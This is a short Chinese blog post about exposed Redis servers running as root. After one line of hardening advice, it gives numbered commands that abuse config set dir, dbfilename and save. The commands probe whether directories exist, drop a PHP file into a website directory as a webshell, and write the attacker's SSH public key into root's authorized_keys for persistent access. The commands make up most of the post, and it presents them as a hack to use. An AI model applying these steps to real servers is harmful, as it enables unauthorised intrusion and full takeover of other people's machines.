溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

關(guān)于Redis的一些好玩東西

發(fā)布時(shí)間:2020-07-07 12:53:49 來源:網(wǎng)絡(luò) 閱讀:565 作者:lailaiji 欄目:安全技術(shù)

   在許多服務(wù)器上部署的Redis是采用Root權(quán)限進(jìn)行啟動(dòng)進(jìn)而可以利用這個(gè)Root做許多超級(jí)權(quán)限的事情。由于REDIS是沒有嚴(yán)格授權(quán)管理機(jī)制大家在部署一定不要設(shè)置為0.0.0.0以及最好使用requirepass(雖然是明文但是至少增加一定的難度)。

本文主要利用的是redis提供的configsave兩個(gè)命令來完成我們的HACK功能便捷的工具用歪了就成了禍害。

簡(jiǎn)單介紹幾個(gè)有用的命令

config set dir $path:

這個(gè)命令是配置為了指定redis的“工作路徑”之后生成的RDB和AOF文件都會(huì)存儲(chǔ)在這里

dbfilename $name:

RDB文件名默認(rèn)為“dump.rdb”

save:

將內(nèi)存里的數(shù)據(jù)進(jìn)行持久化操作


它們結(jié)合在一起就可以實(shí)現(xiàn)如下好玩的功能

1.指定文件夾是否存在

config set dir /home/bob

如果是返回(error) ERR Changing directory: No such file or directory表示沒有該文件夾。

如果返回OK表示服務(wù)器上有這個(gè)文件夾并且已經(jīng)將其設(shè)置為內(nèi)存快照保存的文件夾


2.webshell最好使用之前進(jìn)行flushdb,或者flushall清空內(nèi)存里數(shù)據(jù)

1.config set dir /opt/web/www #設(shè)定網(wǎng)站的目錄
2.config set dbfilename test.php #設(shè)定將要保存的文件名
3.set "<?php phpinfo();?>" "" #我們的webshell
4.save  #將內(nèi)存持久化到test.php


3.訪問信任

1.cat ~/.ssh/id_rsa.pub > ~/foo.txt
2.cat ~/foo.txt|redis -x set hack #將foo.txt里的內(nèi)容保存為一個(gè)KEY為hack的字符串
3.config set dir /root/.ssh/ #設(shè)定root的.ssh文件夾
4.config set dbfilename authorized_keys
5.save


向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI